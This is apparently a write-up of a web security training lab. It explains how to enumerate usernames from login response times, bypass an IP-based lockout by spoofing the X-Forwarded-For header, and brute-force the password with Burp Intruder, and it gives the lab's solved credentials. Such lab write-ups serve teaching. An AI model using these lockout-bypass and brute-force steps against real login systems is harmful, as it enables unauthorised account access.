Comment on page
Username enumeration via response timing
This lab is vulnerable to username enumeration using its response times.
Intercepting a login request with invalid credentials, we are able to see that the server takes some time to get back to us. After a certain number of requests, the server returns
You have made too many incorrect login attempts. Please try again in 30 minute(s).(as shown below) This indicates that the server has some soft of Web Application Firewall inplace to mitigate against brute force attacks.
There are usually 4 possible HTTP headers that can aid in bypassing an IP filter.
X-Forwarded-Forand giving it a random value bypasses the WAF as shown below. We are able to get a response. However, we would have to keep iterating the value of this field to keep bypassing and conduct a brute force attack.
Additionally, I noticed that the server takes longer to respond to a request containing the right username and a long wrong password. However, the server instantly responds to a request containing the wrong username and a long wrong password.
This implies that the server checks the username then the password. We can abuse this and perform username enumeration by sending requests with long passwords accompanied by our username list. If the username is wrong, we would get a quick response. Else, we would get a slow response confirming our username. Pretty cool ngl!
Now that we have an understanding of what goes on in the background, we can now move on to enumerating the usernames. Send the request to Intruder, mark the
usernamefield, modify the password to be any long value and switch the attack type to
Pitch Forkas shown below.
Under the payloads tab, select payload set 1 and set the type to
number. We will be using this payload type to randomize/iterate our
X-Forwarded-Forfield. Under payload options, set the following.
Type = Sequential
From = 10
To = 100
Base = Decimal
Max Fraction Digits = 0
Next select the 2nd payload set and paste the username list for brute force. Once done, hit start attack and wait for the attack to complete.
Meanwhile, enable the
Response receivedand the
Response completedcolumn on the attack window for further analysis later on.
Once sorted by Response Received, as suspected there is a request which yielded a slow response time from the server. The username appears to be
applicationsas shown below.
username = applications
Now that we have the username, we can remove the "long password" technique and rerun the brute force attack with just the
X-Forwarded-Forincrement to bypass the WAF.
Decrease the password length and mark its field instead of the username field.
Replace the list under payload set 2 with the password list and hit start attack.
Once the attack is completed, we are able to see one request with a status code
302which signifies a redirect after a successful login 😉
We are able to infer the password from this response.
password = monitor
Username = applications
Password = monitor
Logging in with these credentials solves the lab!